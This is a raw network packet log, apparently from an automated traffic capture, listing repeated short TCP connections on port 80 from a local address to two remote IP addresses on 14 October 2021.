                      Oct 14, 2021 08:28:45.467830896 CEST4980180192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:45.480146885 CEST8049801172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:48.020804882 CEST4980280192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:48.036874056 CEST8049802104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:48.036969900 CEST4980280192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:48.039638042 CEST4980280192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:48.055605888 CEST8049802104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:48.055685043 CEST4980280192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:48.071571112 CEST8049802104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:48.163419962 CEST8049802104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:48.163548946 CEST4980280192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:48.165496111 CEST8049802104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:48.165595055 CEST4980280192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:48.179533005 CEST8049802104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:49.639492035 CEST4980380192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:49.655677080 CEST8049803104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:49.657088041 CEST4980380192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:49.659260988 CEST4980380192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:49.675313950 CEST8049803104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:49.675806999 CEST4980380192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:49.691874027 CEST8049803104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:49.774518013 CEST8049803104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:49.774641991 CEST8049803104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:49.774741888 CEST4980380192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:49.774770021 CEST4980380192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:49.790961027 CEST8049803104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:50.952090979 CEST4980480192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:50.967997074 CEST8049804104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:50.968147993 CEST4980480192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:50.976326942 CEST4980480192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:50.992233992 CEST8049804104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:50.992428064 CEST4980480192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:51.008234978 CEST8049804104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:51.090559006 CEST8049804104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:51.090776920 CEST4980480192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:51.093907118 CEST8049804104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:51.094017982 CEST4980480192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:51.106555939 CEST8049804104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:52.303160906 CEST4980580192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:52.319185972 CEST8049805104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:52.319715023 CEST4980580192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:52.327367067 CEST4980580192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:52.343226910 CEST8049805104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:52.343465090 CEST4980580192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:52.359374046 CEST8049805104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:52.449971914 CEST8049805104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:52.451148033 CEST4980580192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:52.455553055 CEST8049805104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:52.455698967 CEST4980580192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:52.467087984 CEST8049805104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:53.544533014 CEST4980680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:53.560533047 CEST8049806172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:53.560643911 CEST4980680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:53.563440084 CEST4980680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:53.579401970 CEST8049806172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:53.579511881 CEST4980680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:53.595551968 CEST8049806172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:53.674302101 CEST8049806172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:53.674453020 CEST4980680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:53.679147959 CEST8049806172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:53.679223061 CEST4980680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:53.690466881 CEST8049806172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:54.626549959 CEST4980780192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:54.642462969 CEST8049807104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:54.642591953 CEST4980780192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:54.645978928 CEST4980780192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:54.661820889 CEST8049807104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:54.661925077 CEST4980780192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:54.677676916 CEST8049807104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:54.761792898 CEST8049807104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:54.761943102 CEST4980780192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:54.765676022 CEST8049807104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:54.765758038 CEST4980780192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:54.777797937 CEST8049807104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:56.056102991 CEST4980880192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:56.071824074 CEST8049808172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:56.072069883 CEST4980880192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:56.080095053 CEST4980880192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:56.095856905 CEST8049808172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:56.096412897 CEST4980880192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:56.112082005 CEST8049808172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:56.196356058 CEST8049808172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:56.196599960 CEST4980880192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:56.199531078 CEST8049808172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:56.199629068 CEST4980880192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:56.212317944 CEST8049808172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:57.497778893 CEST4981080192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:57.513653994 CEST8049810172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:57.513819933 CEST4981080192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:57.516459942 CEST4981080192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:57.532274008 CEST8049810172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:57.532377005 CEST4981080192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:57.548203945 CEST8049810172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:57.630285978 CEST8049810172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:57.630428076 CEST4981080192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:57.634421110 CEST8049810172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:57.634573936 CEST4981080192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:57.646219969 CEST8049810172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:58.858968973 CEST4981180192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:58.874847889 CEST8049811172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:58.875158072 CEST4981180192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:58.883204937 CEST4981180192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:58.899183989 CEST8049811172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:58.899343967 CEST4981180192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:58.915180922 CEST8049811172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:59.036413908 CEST8049811172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:59.036602974 CEST4981180192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:59.039031982 CEST8049811172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:59.040175915 CEST4981180192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:59.052285910 CEST8049811172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:00.279390097 CEST4981280192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:00.295269966 CEST8049812172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:00.295372009 CEST4981280192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:00.298238039 CEST4981280192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:00.314100027 CEST8049812172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:00.314201117 CEST4981280192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:00.330084085 CEST8049812172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:00.410363913 CEST8049812172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:00.410526991 CEST4981280192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:00.414992094 CEST8049812172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:00.415082932 CEST4981280192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:00.426451921 CEST8049812172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:01.642504930 CEST4981380192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:01.658246994 CEST8049813172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:01.659168005 CEST4981380192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:01.666924000 CEST4981380192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:01.682801008 CEST8049813172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:01.683583975 CEST4981380192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:01.699321985 CEST8049813172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:01.827079058 CEST8049813172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:01.827256918 CEST4981380192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:01.829689026 CEST8049813172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:01.830264091 CEST4981380192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:01.843548059 CEST8049813172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:03.057848930 CEST4981480192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:03.073795080 CEST8049814104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:03.073904037 CEST4981480192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:03.076479912 CEST4981480192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:03.093050957 CEST8049814104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:03.093130112 CEST4981480192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:03.109030962 CEST8049814104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:03.214101076 CEST8049814104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:03.214225054 CEST4981480192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:03.214323044 CEST8049814104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:03.214382887 CEST4981480192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:03.230099916 CEST8049814104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:06.150192976 CEST4981580192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:06.166016102 CEST8049815172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:06.166265965 CEST4981580192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:06.184636116 CEST4981580192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:06.200299025 CEST8049815172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:06.200411081 CEST4981580192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:06.216032028 CEST8049815172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:06.302758932 CEST8049815172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:06.303061008 CEST8049815172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:06.303184986 CEST4981580192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:06.367196083 CEST4981580192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:06.382930040 CEST8049815172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:07.511693001 CEST4981680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:07.527686119 CEST8049816172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:07.527796984 CEST4981680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:07.530339003 CEST4981680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:07.546386957 CEST8049816172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:07.546461105 CEST4981680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:07.562447071 CEST8049816172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:07.646630049 CEST8049816172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:07.646831989 CEST4981680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:07.652697086 CEST8049816172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:07.652808905 CEST4981680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:07.662858009 CEST8049816172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:08.702898979 CEST4981780192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:08.718863964 CEST8049817104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:08.718980074 CEST4981780192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:08.722565889 CEST4981780192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:08.738461018 CEST8049817104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:08.738579988 CEST4981780192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:08.754503012 CEST8049817104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:08.835047960 CEST8049817104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:08.835613012 CEST4981780192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:08.839998007 CEST8049817104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:08.840123892 CEST4981780192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:08.851569891 CEST8049817104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:09.890640974 CEST4982080192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:09.906680107 CEST8049820104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:09.906817913 CEST4982080192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:09.909565926 CEST4982080192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:09.925491095 CEST8049820104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:09.925599098 CEST4982080192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:09.941586971 CEST8049820104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:10.033361912 CEST8049820104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:10.033516884 CEST4982080192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:10.033694983 CEST8049820104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:10.033761024 CEST4982080192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:10.049477100 CEST8049820104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:11.100315094 CEST4982680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:11.116072893 CEST8049826172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:11.116270065 CEST4982680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:11.124121904 CEST4982680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:11.140005112 CEST8049826172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:11.140162945 CEST4982680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:11.155889988 CEST8049826172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:11.252242088 CEST8049826172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:11.252438068 CEST4982680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:11.260411978 CEST8049826172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:11.260510921 CEST4982680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:11.268137932 CEST8049826172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:12.328859091 CEST4983480192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:12.344630957 CEST8049834172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:12.344770908 CEST4983480192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:12.348795891 CEST4983480192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:12.364546061 CEST8049834172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:12.364717007 CEST4983480192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:12.380440950 CEST8049834172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:12.488634109 CEST8049834172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:12.489018917 CEST4983480192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:12.490758896 CEST8049834172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:12.492058039 CEST4983480192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:12.504658937 CEST8049834172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:13.636471987 CEST4984380192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:13.652439117 CEST8049843172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:13.653642893 CEST4984380192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:13.657084942 CEST4984380192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:13.673026085 CEST8049843172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:13.673129082 CEST4984380192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:13.688971043 CEST8049843172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:13.770459890 CEST8049843172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:13.771907091 CEST4984380192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:13.775058985 CEST8049843172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:13.775441885 CEST4984380192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:13.788501978 CEST8049843172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:15.117068052 CEST4985380192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:15.133296967 CEST8049853172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:15.133588076 CEST4985380192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:15.138021946 CEST4985380192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:15.154012918 CEST8049853172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:15.154344082 CEST4985380192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:15.170353889 CEST8049853172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:15.258631945 CEST8049853172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:15.258793116 CEST4985380192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:15.262315989 CEST8049853172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:15.262511015 CEST4985380192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:15.274777889 CEST8049853172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:16.639605999 CEST4986080192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:16.655596972 CEST8049860104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:16.655901909 CEST4986080192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:16.658468008 CEST4986080192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:16.674443007 CEST8049860104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:16.674575090 CEST4986080192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:16.690541029 CEST8049860104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:16.772655964 CEST8049860104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:16.772679090 CEST8049860104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:16.772775888 CEST4986080192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:16.772816896 CEST4986080192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:16.778476000 CEST8049860104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:16.778572083 CEST4986080192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:17.990361929 CEST4986380192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:18.006529093 CEST8049863104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:18.006691933 CEST4986380192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:18.009855986 CEST4986380192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:18.025885105 CEST8049863104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:18.026037931 CEST4986380192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:18.042042017 CEST8049863104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:18.129460096 CEST8049863104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:18.129709005 CEST4986380192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:18.133486986 CEST8049863104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:18.133609056 CEST4986380192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:18.145648003 CEST8049863104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:20.377567053 CEST4986480192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:20.393802881 CEST8049864104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:20.394676924 CEST4986480192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:20.400475025 CEST4986480192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:20.416377068 CEST8049864104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:20.416629076 CEST4986480192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:20.432496071 CEST8049864104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:20.518090010 CEST8049864104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:20.518548965 CEST4986480192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:20.522037983 CEST8049864104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:20.522156000 CEST4986480192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:20.534503937 CEST8049864104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:21.798049927 CEST4987080192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:21.814004898 CEST8049870172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:21.815773964 CEST4987080192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:21.825018883 CEST4987080192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:21.840924025 CEST8049870172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:21.846321106 CEST4987080192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:21.862538099 CEST8049870172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:21.940284967 CEST8049870172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:21.941325903 CEST4987080192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:21.948467016 CEST8049870172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:21.949280977 CEST4987080192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:21.961464882 CEST8049870172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:23.400367022 CEST4987180192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:23.416105986 CEST8049871104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:23.416366100 CEST4987180192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:23.419826031 CEST4987180192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:23.435573101 CEST8049871104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:23.435642004 CEST4987180192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:23.451368093 CEST8049871104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:23.542494059 CEST8049871104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:23.542738914 CEST4987180192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:23.547996998 CEST8049871104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:23.548326969 CEST4987180192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:23.558412075 CEST8049871104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:27.448055983 CEST4987280192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:27.464031935 CEST8049872172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:27.464251041 CEST4987280192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:27.468224049 CEST4987280192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:27.484173059 CEST8049872172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:27.484252930 CEST4987280192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:27.500216961 CEST8049872172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:27.586599112 CEST8049872172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:27.586764097 CEST4987280192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:27.587049961 CEST8049872172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:27.587133884 CEST4987280192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:27.602746964 CEST8049872172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:29.626770020 CEST4987380192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:29.642803907 CEST8049873104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:29.642931938 CEST4987380192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:29.646629095 CEST4987380192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:29.662648916 CEST8049873104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:29.666580915 CEST4987380192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:29.682674885 CEST8049873104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:29.765604973 CEST8049873104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:29.765788078 CEST4987380192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:29.769172907 CEST8049873104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:29.769994974 CEST4987380192.168.2.6104.21.62.32
                      Oct 14, 2021 08:29:29.781760931 CEST8049873104.21.62.32192.168.2.6
                      Oct 14, 2021 08:29:31.714684963 CEST4987580192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:31.730560064 CEST8049875172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:31.730705976 CEST4987580192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:31.734477043 CEST4987580192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:31.750348091 CEST8049875172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:31.750525951 CEST4987580192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:31.766422033 CEST8049875172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:31.847372055 CEST8049875172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:31.847683907 CEST8049875172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:31.847693920 CEST4987580192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:31.847745895 CEST4987580192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:31.851635933 CEST8049875172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:31.851728916 CEST4987580192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:31.863682032 CEST8049875172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:31.863837004 CEST4987580192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:32.986711979 CEST4987680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:33.002589941 CEST8049876172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:33.002734900 CEST4987680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:33.006582975 CEST4987680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:29:33.022450924 CEST8049876172.67.219.104192.168.2.6
                      Oct 14, 2021 08:29:33.022634983 CEST4987680192.168.2.6172.67.219.104
